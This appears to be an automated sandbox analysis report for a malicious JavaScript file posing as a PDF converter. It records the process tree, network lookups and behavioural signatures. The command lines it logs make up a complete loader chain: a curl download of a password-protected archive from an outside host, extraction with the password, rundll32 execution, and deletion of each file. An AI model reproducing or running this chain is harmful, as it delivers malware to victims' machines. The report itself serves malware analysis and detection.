Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Sept. 14, 2023, 2:30 p.m.	Sept. 14, 2023, 2:32 p.m.

Size	45.0KB
Type	ASCII text
MD5	`44096c929ae4aa847f13d91311eb84b8`
SHA256	`f56295432ae84c8b1b48024edae29939ae8d0ff988b97ba77169343d6ada72f3`
CRC32	`B3D190D6`
ssdeep	`384:D6sdEZ3d3+3S+dfOMGxKecfBVQjgvlzbzNYCAHNo1mB9yWbWyF7Xv99ndMzktipM:RdEL3fpP+nb1InhBQayb6Q3pu`
Yara	None matched

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\convert-pdf-591.js
2560
- cmd.exe "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-591.js"
  2656
- cmd.exe "C:\Windows\System32\cmd.exe" /c echo curl https://virtuehost.net/clients/ferndale/node_modules/json-schema-traverse/spec/fixtures/786.7z --output "C:\Users\test22\AppData\Local\Temp\laboriosam.o" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\laudantium.u.bat"
  2712
- cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\laudantium.u.bat"
  2808
  - curl.exe curl https://virtuehost.net/clients/ferndale/node_modules/json-schema-traverse/spec/fixtures/786.7z --output "C:\Users\test22\AppData\Local\Temp\laboriosam.o" --ssl-no-revoke --insecure --location
    2880
- curl.exe "C:\util\curl\curl.exe" https://www.7-zip.org/a/7zr.exe --output "C:\Users\test22\AppData\Local\Temp\sequi.h"
  2948
- cmd.exe "C:\Windows\System32\cmd.exe" /c ""C:\Users\test22\AppData\Local\Temp\sequi.h" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\test22\AppData\Local\Temp\laboriosam.o" > "C:\Users\test22\AppData\Local\Temp\laudantium.uprovident.i""
  2548
  - sequi.h "C:\Users\test22\AppData\Local\Temp\sequi.h" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\test22\AppData\Local\Temp\laboriosam.o"
    2644
- cmd.exe "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\sequi.h"
  2760
- cmd.exe "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\laboriosam.o"
  2900
- cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\test22\AppData\Local\Temp\laudantium.uprovident.i" "laudantium.u"
  2868
- rundll32.exe "C:\Windows\System32\rundll32.exe" "C:\Users\test22\AppData\Local\Temp\laudantium.u", scab /k arbalet875
  3024
- cmd.exe "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\laudantium.u.bat"
  284

Name	Response	Post-Analysis Lookup
virtuehost.net	A 192.185.33.166	192.185.33.166
www.7-zip.org	A 49.12.202.237	49.12.202.237

IP Address	Status	Action
164.124.101.2	Active	Moloch
192.185.33.166	Active	Moloch
49.12.202.237	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLS 1.3 192.168.56.101:49169 192.185.33.166:443	None	None	None
TLS 1.3 192.168.56.101:49173 49.12.202.237:443	None	None	None

Command line console output was observed (6 events)

Time & API	Arguments	Status	Return
WriteConsoleW Sept. 14, 2023, 2:30 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Sept. 14, 2023, 2:30 p.m.	buffer: curl console_handle: 0x00000007	1	1
WriteConsoleW Sept. 14, 2023, 2:30 p.m.	buffer: https://virtuehost.net/clients/ferndale/node_modules/json-schema-traverse/spec/fixtures/786.7z --output "C:\Users\test22\AppData\Local\Temp\laboriosam.o" --ssl-no-revoke --insecure --location console_handle: 0x00000007	1	1
WriteConsoleA Sept. 14, 2023, 2:31 p.m.	buffer: ERROR: console_handle: 0x0000000b	1	1
WriteConsoleA Sept. 14, 2023, 2:31 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\laboriosam.o console_handle: 0x0000000b	1	1
WriteConsoleA Sept. 14, 2023, 2:31 p.m.	buffer: Cannot open the file as archive console_handle: 0x0000000b	1	1

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Starts servers listening (6 events)

Time & API	Arguments	Status	Return
bind Sept. 14, 2023, 2:23 p.m.	ip_address: 127.0.0.1 socket: 144 port: 0	1	0
listen Sept. 14, 2023, 2:23 p.m.	socket: 144 backlog: 1	1	0
accept Sept. 14, 2023, 2:23 p.m.	ip_address: socket: 144 port: 0	1	152
bind Sept. 14, 2023, 2:23 p.m.	ip_address: 127.0.0.1 socket: 144 port: 0	1	0
listen Sept. 14, 2023, 2:23 p.m.	socket: 144 backlog: 1	1	0
accept Sept. 14, 2023, 2:23 p.m.	ip_address: socket: 144 port: 0	1	152

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\Temp\laudantium.u.bat

Creates a suspicious process (16 events)

cmdline	"C:\Windows\System32\cmd.exe" /c ren "C:\Users\test22\AppData\Local\Temp\laudantium.uprovident.i" "laudantium.u"
cmdline	cmd.exe /c ""C:\Users\test22\AppData\Local\Temp\sequi.h" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\test22\AppData\Local\Temp\laboriosam.o" > "C:\Users\test22\AppData\Local\Temp\laudantium.uprovident.i""
cmdline	cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-591.js"
cmdline	"C:\Windows\System32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\laudantium.u.bat"
cmdline	cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\laboriosam.o"
cmdline	cmd.exe /c "C:\Users\test22\AppData\Local\Temp\laudantium.u.bat"
cmdline	"C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-591.js"
cmdline	cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\laudantium.u.bat"
cmdline	cmd.exe /c echo curl https://virtuehost.net/clients/ferndale/node_modules/json-schema-traverse/spec/fixtures/786.7z --output "C:\Users\test22\AppData\Local\Temp\laboriosam.o" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\laudantium.u.bat"
cmdline	"C:\Windows\System32\cmd.exe" /c echo curl https://virtuehost.net/clients/ferndale/node_modules/json-schema-traverse/spec/fixtures/786.7z --output "C:\Users\test22\AppData\Local\Temp\laboriosam.o" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\laudantium.u.bat"
cmdline	cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\sequi.h"
cmdline	"C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\laudantium.u.bat"
cmdline	cmd.exe /c ren "C:\Users\test22\AppData\Local\Temp\laudantium.uprovident.i" "laudantium.u"
cmdline	"C:\Windows\System32\cmd.exe" /c ""C:\Users\test22\AppData\Local\Temp\sequi.h" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\test22\AppData\Local\Temp\laboriosam.o" > "C:\Users\test22\AppData\Local\Temp\laudantium.uprovident.i""
cmdline	"C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\sequi.h"
cmdline	"C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\laboriosam.o"

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Local\Temp\sequi.h

A process created a hidden window (10 events)

Time & API	Arguments	Status	Return
ShellExecuteExW Sept. 14, 2023, 2:30 p.m.	show_type: 0 filepath_r: cmd.exe parameters: /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-591.js" filepath: cmd.exe	1	1
ShellExecuteExW Sept. 14, 2023, 2:30 p.m.	show_type: 0 filepath_r: cmd.exe parameters: /c echo curl https://virtuehost.net/clients/ferndale/node_modules/json-schema-traverse/spec/fixtures/786.7z --output "C:\Users\test22\AppData\Local\Temp\laboriosam.o" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\laudantium.u.bat" filepath: cmd.exe	1	1
ShellExecuteExW Sept. 14, 2023, 2:30 p.m.	show_type: 0 filepath_r: cmd.exe parameters: /c "C:\Users\test22\AppData\Local\Temp\laudantium.u.bat" filepath: cmd.exe	1	1
ShellExecuteExW Sept. 14, 2023, 2:30 p.m.	show_type: 0 filepath_r: curl parameters: https://www.7-zip.org/a/7zr.exe --output "C:\Users\test22\AppData\Local\Temp\sequi.h" filepath: curl	1	1
ShellExecuteExW Sept. 14, 2023, 2:31 p.m.	show_type: 0 filepath_r: cmd.exe parameters: /c ""C:\Users\test22\AppData\Local\Temp\sequi.h" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\test22\AppData\Local\Temp\laboriosam.o" > "C:\Users\test22\AppData\Local\Temp\laudantium.uprovident.i"" filepath: cmd.exe	1	1
ShellExecuteExW Sept. 14, 2023, 2:31 p.m.	show_type: 0 filepath_r: cmd.exe parameters: /c del "C:\Users\test22\AppData\Local\Temp\sequi.h" filepath: cmd.exe	1	1
ShellExecuteExW Sept. 14, 2023, 2:31 p.m.	show_type: 0 filepath_r: cmd.exe parameters: /c del "C:\Users\test22\AppData\Local\Temp\laboriosam.o" filepath: cmd.exe	1	1
ShellExecuteExW Sept. 14, 2023, 2:31 p.m.	show_type: 0 filepath_r: cmd.exe parameters: /c ren "C:\Users\test22\AppData\Local\Temp\laudantium.uprovident.i" "laudantium.u" filepath: cmd.exe	1	1
ShellExecuteExW Sept. 14, 2023, 2:31 p.m.	show_type: 0 filepath_r: rundll32 parameters: "C:\Users\test22\AppData\Local\Temp\laudantium.u", scab /k arbalet875 filepath: rundll32	1	1
ShellExecuteExW Sept. 14, 2023, 2:31 p.m.	show_type: 0 filepath_r: cmd.exe parameters: /c del "C:\Users\test22\AppData\Local\Temp\laudantium.u.bat" filepath: cmd.exe	1	1

Checks for the Locally Unique Identifier on the system for a suspicious privilege (3 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW Sept. 14, 2023, 2:31 p.m.	system_name: privilege_name: SeRestorePrivilege	1	1
LookupPrivilegeValueW Sept. 14, 2023, 2:31 p.m.	system_name: privilege_name: SeSecurityPrivilege	1	1
LookupPrivilegeValueW Sept. 14, 2023, 2:31 p.m.	system_name: privilege_name: SeSecurityPrivilege	1	1

Uses Windows utilities for basic Windows functionality (8 events)

cmdline	cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-591.js"
cmdline	cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\laboriosam.o"
cmdline	"C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-591.js"
cmdline	cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\laudantium.u.bat"
cmdline	cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\sequi.h"
cmdline	"C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\laudantium.u.bat"
cmdline	"C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\sequi.h"
cmdline	"C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\laboriosam.o"

Deletes executed files from disk (1 event)

file	C:\Users\test22\AppData\Local\Temp\laboriosam.o

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Local\Temp\sequi.h

One or more non-whitelisted processes were created (20 events)

parent_process	wscript.exe	martian_process	cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\laboriosam.o"
parent_process	wscript.exe	martian_process	cmd.exe /c echo curl https://virtuehost.net/clients/ferndale/node_modules/json-schema-traverse/spec/fixtures/786.7z --output "C:\Users\test22\AppData\Local\Temp\laboriosam.o" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\laudantium.u.bat"
parent_process	wscript.exe	martian_process	curl https://www.7-zip.org/a/7zr.exe --output "C:\Users\test22\AppData\Local\Temp\sequi.h"
parent_process	wscript.exe	martian_process	"C:\Windows\System32\cmd.exe" /c echo curl https://virtuehost.net/clients/ferndale/node_modules/json-schema-traverse/spec/fixtures/786.7z --output "C:\Users\test22\AppData\Local\Temp\laboriosam.o" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\laudantium.u.bat"
parent_process	wscript.exe	martian_process	cmd.exe /c "C:\Users\test22\AppData\Local\Temp\laudantium.u.bat"
parent_process	wscript.exe	martian_process	cmd.exe /c ren "C:\Users\test22\AppData\Local\Temp\laudantium.uprovident.i" "laudantium.u"
parent_process	wscript.exe	martian_process	"C:\Windows\System32\cmd.exe" /c ""C:\Users\test22\AppData\Local\Temp\sequi.h" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\test22\AppData\Local\Temp\laboriosam.o" > "C:\Users\test22\AppData\Local\Temp\laudantium.uprovident.i""
parent_process	wscript.exe	martian_process	"C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-591.js"
parent_process	wscript.exe	martian_process	"C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\sequi.h"
parent_process	wscript.exe	martian_process	cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-591.js"
parent_process	wscript.exe	martian_process	"C:\Windows\System32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\laudantium.u.bat"
parent_process	wscript.exe	martian_process	cmd.exe /c ""C:\Users\test22\AppData\Local\Temp\sequi.h" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\test22\AppData\Local\Temp\laboriosam.o" > "C:\Users\test22\AppData\Local\Temp\laudantium.uprovident.i""
parent_process	wscript.exe	martian_process	cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\sequi.h"
parent_process	wscript.exe	martian_process	cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\laudantium.u.bat"
parent_process	wscript.exe	martian_process	"C:\Windows\System32\cmd.exe" /c ren "C:\Users\test22\AppData\Local\Temp\laudantium.uprovident.i" "laudantium.u"
parent_process	wscript.exe	martian_process	"C:\util\curl\curl.exe" https://www.7-zip.org/a/7zr.exe --output "C:\Users\test22\AppData\Local\Temp\sequi.h"
parent_process	wscript.exe	martian_process	"C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\laboriosam.o"
parent_process	wscript.exe	martian_process	rundll32 "C:\Users\test22\AppData\Local\Temp\laudantium.u", scab /k arbalet875
parent_process	wscript.exe	martian_process	"C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\laudantium.u.bat"
parent_process	wscript.exe	martian_process	"C:\Windows\System32\rundll32.exe" "C:\Users\test22\AppData\Local\Temp\laudantium.u", scab /k arbalet875

The process wscript.exe wrote an executable file to disk which it then attempted to execute (3 events)

file	C:\Windows\System32\cmd.exe
file	C:\util\curl\curl.exe
file	C:\Windows\System32\rundll32.exe

convert-pdf-591.js

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All